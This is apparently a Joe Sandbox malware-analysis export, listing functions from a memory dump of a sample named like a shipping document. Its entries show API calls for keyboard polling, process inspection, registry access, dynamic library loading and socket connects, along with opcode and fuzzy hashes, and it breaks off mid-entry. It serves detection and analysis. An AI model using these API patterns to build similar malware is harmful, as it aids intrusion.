Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: D=t
API String ID: 3277943733-3042050453
Opcode ID: cb1060878ab2cabdb2734bc9aa16553afcf805cb387b06d54ed5347f823c1479
Instruction ID: 7a0302dc69bcbda89bc9ad34f01a49b75003858e8dfdbbf48599c539f6934480
Opcode Fuzzy Hash: cb1060878ab2cabdb2734bc9aa16553afcf805cb387b06d54ed5347f823c1479
Instruction Fuzzy Hash: 73F0F4F5A40314BAF2106765AC45F777E6DDB05758F008521BE0CDA1A2D7795D104AAC

Function 006E1945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 006E19F3
GetProcessIoCounters.KERNEL32(00000000,?), ref: 006E1A26
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 006E1B49
CloseHandle.KERNEL32(?), ref: 006E1BBF

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: be7e783eef23b559a95347fd702d0be79b7a6db4aefd37ee7aff2473e80c396e
Instruction ID: 585a10a9ec1677d05282246da0c8daeb2084d8c5aec869be5df16251fef1fc0a
Opcode Fuzzy Hash: be7e783eef23b559a95347fd702d0be79b7a6db4aefd37ee7aff2473e80c396e
Instruction Fuzzy Hash: 08819170601301ABDF50AF65C896BADBBEAAF05720F148459F905AF382DBB4E9418B94

Function 006EE062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 006EE1D5
SendMessageW.USER32(?,000000B0,?,?), ref: 006EE20D
IsDlgButtonChecked.USER32(?,00000001), ref: 006EE248
GetWindowLongW.USER32(?,000000EC), ref: 006EE269
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 006EE281

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSend$ButtonCheckedLongWindow
String ID:
API String ID: 3188977179-0
Opcode ID: e55b45a452a1eb6cdd0949e8701ac6013cbf8f25537cef050606c55ade9f2f74
Instruction ID: c2943b598570d5f90c69be60f561ff898ee8126fc059206d7f3423700158ce7d
Opcode Fuzzy Hash: e55b45a452a1eb6cdd0949e8701ac6013cbf8f25537cef050606c55ade9f2f74
Instruction Fuzzy Hash: D161A034A02384AFDB21DF59C894FEA77BBAF49300F148099E959973A1C776A990CB11

Function 006C1C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 006C1CB4
VariantClear.OLEAUT32(00000013), ref: 006C1D26
VariantClear.OLEAUT32(00000000), ref: 006C1D81
VariantClear.OLEAUT32(?), ref: 006C1DF8
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 006C1E26

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: dfca447a66ef70c8bca2590fd59d3015a3db12abf34f2bc29c24fce707646c02
Instruction ID: 7c9132a6d7b668154be31b7d35470e7a4261229ad99d084492441a18576a81f2
Opcode Fuzzy Hash: dfca447a66ef70c8bca2590fd59d3015a3db12abf34f2bc29c24fce707646c02
Instruction Fuzzy Hash: 085169B5A00209EFCB14CF58C884EAAB7B9FF4E314B158559ED5ADB301D734EA51CBA0

Function 006E0688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0068936C: __swprintf.LIBCMT ref: 006893AB
Part of subcall function 0068936C: __itow.LIBCMT ref: 006893DF

LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 006E06EE
GetProcAddress.KERNEL32(00000000,?), ref: 006E077D
GetProcAddress.KERNEL32(00000000,00000000), ref: 006E079B
GetProcAddress.KERNEL32(00000000,?), ref: 006E07E1
FreeLibrary.KERNEL32(00000000,00000004), ref: 006E07FB

Part of subcall function 0069E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,006CA574,?,?,00000000,00000008), ref: 0069E675
Part of subcall function 0069E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,006CA574,?,?,00000000,00000008), ref: 0069E699

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 02132ab0287e41f16c80cff845689a4f78b33f84be0fdeb4fbb29d7a7a63e349
Instruction ID: a1d92cf339698245c54ad9e994f5c6d8e37adf733884f61cc1d173f4a444a1c1
Opcode Fuzzy Hash: 02132ab0287e41f16c80cff845689a4f78b33f84be0fdeb4fbb29d7a7a63e349
Instruction Fuzzy Hash: F7517975A00249DFDF00EFA8C890DADB7B6BF08310F048159EA15AB352DB74ED46CB94

Function 006E2E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 006E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006E2BB5,?,?), ref: 006E3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006E2EEF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006E2F2E
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 006E2F75
RegCloseKey.ADVAPI32(?,?), ref: 006E2FA1
RegCloseKey.ADVAPI32(00000000), ref: 006E2FAE

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 3740051246-0
Opcode ID: 32412e2ade66b89e7ec10fb1d026e26bc0fa67635b9c7098e3fc78ebdb52b5f1
Instruction ID: 32e32428d74dfd8c1d02eb387d6a828bb5a41ca68deb7bae4ffe9cc8e426435a
Opcode Fuzzy Hash: 32412e2ade66b89e7ec10fb1d026e26bc0fa67635b9c7098e3fc78ebdb52b5f1
Instruction Fuzzy Hash: 6D518A71208345AFD744EF64C891EAAB7FAFF88314F00891DF59587291EB70E905CB66

Function 006ECCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9afa0071f7eff589f1c12d8b9c910b42564878647e0983cdbbb71405743c967
Instruction ID: 3121cb2d068c3e3b66959dec40f9752d6f6575095e733441bb6540ac8d12289a
Opcode Fuzzy Hash: d9afa0071f7eff589f1c12d8b9c910b42564878647e0983cdbbb71405743c967
Instruction Fuzzy Hash: 1141E639902384EFC720DB69CC44FE97B6AEF09330F154265F819A72D1C735AD42DA54

Function 006D1206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 006D12B4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 006D12DD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 006D131C

Part of subcall function 0068936C: __swprintf.LIBCMT ref: 006893AB
Part of subcall function 0068936C: __itow.LIBCMT ref: 006893DF

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 006D1341
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 006D1349

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 8f2ab912745fc96fcf5a673516635a4ec79b1fe687724167e47b40dc8014aa9c
Instruction ID: c2388ebb1bff5d253e40ab16958f2b6f478e9f5589b5c66e8f02d49bfd48db77
Opcode Fuzzy Hash: 8f2ab912745fc96fcf5a673516635a4ec79b1fe687724167e47b40dc8014aa9c
Instruction Fuzzy Hash: EF412F35A00105EFCF41EF64C9919ADBBF6FF09310B148199E906AB362CB31ED01DB65

Function 0069B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 0069B64F
ScreenToClient.USER32(00000000,000000FF), ref: 0069B66C
GetAsyncKeyState.USER32(00000001), ref: 0069B691
GetAsyncKeyState.USER32(00000002), ref: 0069B69F

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: f18bf2a936e579246218076e0a6b2fa99e248001e7ef71c82c47f496e623266e
Instruction ID: 1120a8a96de9354f1fc5bcdb529bdef4a86b32bc091e3eec4cedf3691fe6dc43
Opcode Fuzzy Hash: f18bf2a936e579246218076e0a6b2fa99e248001e7ef71c82c47f496e623266e
Instruction Fuzzy Hash: 43416C31508219FFCF159F64C944EE9BBBABB05324F20431AF92996290CB31BD94DFA1

Function 006BB358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 006BB369
PostMessageW.USER32(?,00000201,00000001), ref: 006BB413
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 006BB41B
PostMessageW.USER32(?,00000202,00000000), ref: 006BB429
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 006BB431

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 75163193014eeb8325b23d27684fbed943cf54c162624a0027ee69845a5f5a07
Instruction ID: f0eaff0646e75288d23ac86195e929811721159f56c0eb55755c7075afda3a13
Opcode Fuzzy Hash: 75163193014eeb8325b23d27684fbed943cf54c162624a0027ee69845a5f5a07
Instruction Fuzzy Hash: B1319CB1900219EBDB14CFA8D94DADE7BB6FB04315F108229F921AB2D1C7B49D95CB90

Function 006BDBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 006BDBD7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 006BDBF4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 006BDC2C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 006BDC52
_wcsstr.LIBCMT ref: 006BDC5C

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 777bf731cee5e5d605b0238d464c51e7cdc5957a95e07876fe67c973b06d2574
Instruction ID: 6f01f93ab1fc6ad371e6b9e157730f03823c19dcee8ca344445525c1a20a1c96
Opcode Fuzzy Hash: 777bf731cee5e5d605b0238d464c51e7cdc5957a95e07876fe67c973b06d2574
Instruction Fuzzy Hash: F621F5B1204200BBEB259B699C49EBB7FAEDF45760F108039F809CE191EFA5CC819764

Function 006BBC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006BBC90
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006BBCC2
__itow.LIBCMT ref: 006BBCDA
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006BBD00
__itow.LIBCMT ref: 006BBD11

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 565c64f993e3a3a052cf828422866a6edd2ea20693cc1ab1ba5c66afe6825d37
Instruction ID: 295b270ece242a19d43f9d0e4096179acc2d35f8810685527658298deeba1d8d
Opcode Fuzzy Hash: 565c64f993e3a3a052cf828422866a6edd2ea20693cc1ab1ba5c66afe6825d37
Instruction Fuzzy Hash: E321F9B5600208BFDB20AF648C46FDE7A6AAF4A350F001428FA05EB181DBA48D8587A5

Function 006C6318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 006850E6: _wcsncpy.LIBCMT ref: 006850FA

GetFileAttributesW.KERNEL32(?,?,?,?,006C60C3), ref: 006C6369
GetLastError.KERNEL32(?,?,?,006C60C3), ref: 006C6374
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,006C60C3), ref: 006C6388
_wcsrchr.LIBCMT ref: 006C63AA

Part of subcall function 006C6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,006C60C3), ref: 006C63E0

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
Opcode ID: a9fc0d020db18e385b04573c56bacf5b68a41c6362c3bfb5835febd7df99640a
Instruction ID: e2c91c3b3d7b5dc42d508be1174a404f20078274c627056a3576d0de046b7481
Opcode Fuzzy Hash: a9fc0d020db18e385b04573c56bacf5b68a41c6362c3bfb5835febd7df99640a
Instruction Fuzzy Hash: 4621F6315042558AEB25AB78DC42FFA23AEEF16360F10506DF009C31C1EE60DD818A6D

Function 006D8B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 006DA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 006DA84E

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 006D8BD3
WSAGetLastError.WSOCK32(00000000), ref: 006D8BE2
connect.WSOCK32(00000000,?,00000010), ref: 006D8BFE

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: 39b73cf13936482bbe49a70efc9316eff401b3ab253dd9d6c52487b46e588ea8
Instruction ID: 2878353a696421473fe70a43517f3d73aeb38711c7bc3344c02fc8110cb033d8
Opcode Fuzzy Hash: 39b73cf13936482bbe49a70efc9316eff401b3ab253dd9d6c52487b46e588ea8
Instruction Fuzzy Hash: 9B216F716002149FCB50AF68CD59B7E77AAEF48720F04855DF91697391CE74AC018765

Function 006D8420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 006D8441
GetForegroundWindow.USER32 ref: 006D8458
GetDC.USER32(00000000), ref: 006D8494
GetPixel.GDI32(00000000,?,00000003), ref: 006D84A0
ReleaseDC.USER32(00000000,00000003), ref: 006D84DB

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 874db0ae92abc6bf8d55c1b27f1608fb440347b72b6690b6cb62005dea14fa9c
Instruction ID: ef067e41d5885ccdabae4264019706a7a87a8cc20aea7c59fb1bd73cfb89c6a2
Opcode Fuzzy Hash: 874db0ae92abc6bf8d55c1b27f1608fb440347b72b6690b6cb62005dea14fa9c
Instruction Fuzzy Hash: F8219F75A00204EFD750EFA4C889AAEBBE6EF48341F04C47DE85997351CE74AD00CB64

Function 0069AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0069AFE3
SelectObject.GDI32(?,00000000), ref: 0069AFF2
BeginPath.GDI32(?), ref: 0069B009
SelectObject.GDI32(?,00000000), ref: 0069B033

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 45ebf5685b06b7ff70b6b5e0f49cf43a988199a54f2b9658ef7c0b58dc67102d
Instruction ID: 5c522f6dd8f5d56cd46f7780d1ee512fa09ea7f3aff3898decb9e28c9ac0323d
Opcode Fuzzy Hash: 45ebf5685b06b7ff70b6b5e0f49cf43a988199a54f2b9658ef7c0b58dc67102d
Instruction Fuzzy Hash: 4621D674800309EFCF20EF94EC48B9A3B6EB711355F55C31BE524921A0CB798891CF96

Function 006A217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 006A21A9
CreateThread.KERNEL32(?,?,006A22DF,00000000,?,?), ref: 006A21ED
GetLastError.KERNEL32 ref: 006A21F7
_free.LIBCMT ref: 006A2200
__dosmaperr.LIBCMT ref: 006A220B

Part of subcall function 006A7C0E: __getptd_noexit.LIBCMT ref: 006A7C0E

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: e2886c4d29d22f6fb0463449c03adc51b1d56221fcc75b2177559f3adffb9143
Instruction ID: ca09b6f335cc66643013eb7a08e9b0c501efd1142a4dc653256213bd974fd10d
Opcode Fuzzy Hash: e2886c4d29d22f6fb0463449c03adc51b1d56221fcc75b2177559f3adffb9143
Instruction Fuzzy Hash: D611C232144307AF9B21BFA8DC41E9B7B9AAF03770B10052DFA1486251DB718C418EA4

Function 006BABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 006BABD7
GetLastError.KERNEL32(?,006BA69F,?,?,?), ref: 006BABE1
GetProcessHeap.KERNEL32(00000008,?,?,006BA69F,?,?,?), ref: 006BABF0
